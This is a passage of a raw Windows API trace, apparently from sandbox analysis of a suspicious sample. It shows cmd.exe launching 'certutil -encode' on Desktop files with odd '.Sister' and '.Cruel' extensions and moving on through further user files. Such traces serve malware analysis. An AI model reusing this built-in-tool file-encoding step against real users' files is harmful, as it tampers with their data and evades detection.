hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0275.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.838] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0275.925] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0276.003] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0276.004] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0276.004] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0276.004] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0276.004] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0276.004] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0276.004] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0276.004] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0276.004] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0276.004] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0276.004] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0276.004] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0276.004] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0276.004] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0276.004] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0276.004] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0276.004] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0276.004] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0276.005] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0276.005] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0276.005] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0276.005] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0276.005] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0276.005] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0276.005] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0276.005] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0276.005] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0276.005] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0276.005] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0276.005] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0276.005] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0276.005] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0276.005] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0276.005] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0276.005] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0276.005] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0276.005] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0276.005] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0276.005] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0276.005] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0276.005] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0276.005] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0276.005] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0276.006] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0276.006] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0276.006] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0276.006] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0276.006] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0276.006] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0276.006] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0276.006] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0276.006] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0276.006] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0276.006] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0276.006] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0276.006] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0276.006] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0276.006] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0276.006] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0276.006] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0276.006] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0276.006] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0276.006] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0276.006] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0276.006] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0276.006] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0276.006] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0276.006] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0276.006] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0276.007] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0276.007] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0276.007] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0276.007] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0276.007] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0276.007] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0276.007] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0276.007] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0276.007] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0276.007] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0276.007] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0276.007] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0276.007] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0276.007] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0276.007] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0276.007] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0276.007] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0276.007] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0276.007] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0276.007] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0276.007] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0276.007] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0276.007] ??_V@YAXPEAX@Z () returned 0x1 [0276.007] GetProcessHeap () returned 0x21ed8c70000 [0276.007] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9410fa0 [0276.008] GetProcessHeap () returned 0x21ed8c70000 [0276.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa2) returned 0x21ed937ee90 [0276.008] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0276.008] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0276.008] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0276.008] GetProcessHeap () returned 0x21ed8c70000 [0276.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9420f90 [0276.011] SetErrorMode (uMode=0x0) returned 0x0 [0276.011] SetErrorMode (uMode=0x1) returned 0x0 [0276.011] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9420fa0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0276.011] SetErrorMode (uMode=0x0) returned 0x1 [0276.011] GetProcessHeap () returned 0x21ed8c70000 [0276.011] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9420f90, Size=0x52) returned 0x21ed9420f90 [0276.011] GetProcessHeap () returned 0x21ed8c70000 [0276.011] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9420f90) returned 0x52 [0276.011] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0276.011] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0276.011] GetProcessHeap () returned 0x21ed8c70000 [0276.011] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937bc80 [0276.011] GetProcessHeap () returned 0x21ed8c70000 [0276.011] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed93b0300 [0276.011] GetProcessHeap () returned 0x21ed8c70000 [0276.011] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0300, Size=0x1be) returned 0x21ed93b0300 [0276.012] GetProcessHeap () returned 0x21ed8c70000 [0276.012] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0300) returned 0x1be [0276.012] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0276.012] GetProcessHeap () returned 0x21ed8c70000 [0276.012] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d66c60 [0276.012] GetProcessHeap () returned 0x21ed8c70000 [0276.012] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66c60, Size=0x7e) returned 0x21ed8d66c60 [0276.012] GetProcessHeap () returned 0x21ed8c70000 [0276.012] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66c60) returned 0x7e [0276.012] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0276.012] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0276.012] GetLastError () returned 0x2 [0276.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0276.013] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0276.013] GetLastError () returned 0x2 [0276.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0276.013] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0276.014] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0276.014] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0276.014] GetLastError () returned 0x2 [0276.014] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0276.014] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0276.015] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0276.015] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0276.015] ??_V@YAXPEAX@Z () returned 0x1 [0276.015] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0276.086] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0276.086] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0276.086] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0276.086] GetProcessHeap () returned 0x21ed8c70000 [0276.086] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45b30 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0276.087] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0276.088] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0276.088] GetProcessHeap () returned 0x21ed8c70000 [0276.088] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0276.088] GetProcessHeap () returned 0x21ed8c70000 [0276.088] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c956a0 [0276.089] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0276.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0276.089] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0276.157] _get_osfhandle (_FileHandle=0) returned 0x4c [0276.157] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0276.227] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bmp.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bmp.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xfb8, dwThreadId=0xfbc)) returned 1 [0276.240] CloseHandle (hObject=0xa8) returned 1 [0276.240] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0276.240] GetProcessHeap () returned 0x21ed8c70000 [0276.241] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937e340) returned 1 [0276.241] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0276.241] GetProcessHeap () returned 0x21ed8c70000 [0276.241] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d820 [0276.241] FreeEnvironmentStringsA (penv="=") returned 1 [0276.241] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0278.007] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0278.007] CloseHandle (hObject=0xa4) returned 1 [0278.007] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0278.007] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0278.007] GetProcessHeap () returned 0x21ed8c70000 [0278.007] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d820) returned 1 [0278.007] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0278.008] GetProcessHeap () returned 0x21ed8c70000 [0278.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d820 [0278.008] FreeEnvironmentStringsA (penv="=") returned 1 [0278.008] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0278.008] GetProcessHeap () returned 0x21ed8c70000 [0278.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d820) returned 1 [0278.008] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0278.008] GetProcessHeap () returned 0x21ed8c70000 [0278.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d820 [0278.008] FreeEnvironmentStringsA (penv="=") returned 1 [0278.008] GetProcessHeap () returned 0x21ed8c70000 [0278.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c956a0) returned 1 [0278.008] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0278.008] ??_V@YAXPEAX@Z () returned 0x1 [0278.008] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25deb2e0, ftCreationTime.dwHighDateTime=0x1d5e56f, ftLastAccessTime.dwLowDateTime=0x18f51030, ftLastAccessTime.dwHighDateTime=0x1d5e8a1, ftLastWriteTime.dwLowDateTime=0x18f51030, ftLastWriteTime.dwHighDateTime=0x1d5e8a1, nFileSizeHigh=0x0, nFileSizeLow=0x11057, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="zfOV4.swf.Sister", cAlternateFileName="")) returned 1 [0278.009] GetProcessHeap () returned 0x21ed8c70000 [0278.009] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937d160, Size=0x6d8) returned 0x21ed937e370 [0278.009] GetProcessHeap () returned 0x21ed8c70000 [0278.009] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e370) returned 0x6d8 [0278.009] GetProcessHeap () returned 0x21ed8c70000 [0278.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a3f0 [0278.009] GetProcessHeap () returned 0x21ed8c70000 [0278.009] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a3f0, Size=0x58) returned 0x21ed8d2a3f0 [0278.009] GetProcessHeap () returned 0x21ed8c70000 [0278.009] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a3f0) returned 0x58 [0278.009] GetProcessHeap () returned 0x21ed8c70000 [0278.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a460 [0278.009] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0278.010] GetProcessHeap () returned 0x21ed8c70000 [0278.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8750 [0278.010] ??_V@YAXPEAX@Z () returned 0x1 [0278.010] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0278.010] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0278.011] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0278.011] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cc40 [0278.011] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0278.011] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcfe81443, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xcfe81443, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0278.012] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0278.012] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zfOV4.swf.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25deb2e0, ftCreationTime.dwHighDateTime=0x1d5e56f, ftLastAccessTime.dwLowDateTime=0x18f51030, ftLastAccessTime.dwHighDateTime=0x1d5e8a1, ftLastWriteTime.dwLowDateTime=0x18f51030, ftLastWriteTime.dwHighDateTime=0x1d5e8a1, nFileSizeHigh=0x0, nFileSizeLow=0x11057, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="zfOV4.swf.Sister", cAlternateFileName="ZFOV4S~1.SIS")) returned 0x21ed8c7d060 [0278.012] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0278.012] _wcsnicmp (_String1="ZFOV4S~1.SIS", _String2="zfOV4.swf.Sister", _MaxCount=0x10) returned 69 [0278.012] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0278.012] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0278.013] GetProcessHeap () returned 0x21ed8c70000 [0278.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45d10 [0278.013] ??_V@YAXPEAX@Z () returned 0x1 [0278.013] ??_V@YAXPEAX@Z () returned 0x1 [0278.013] GetProcessHeap () returned 0x21ed8c70000 [0278.013] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a460, Size=0x180) returned 0x21ed8d2a460 [0278.013] GetProcessHeap () returned 0x21ed8c70000 [0278.013] RtlSizeHeap 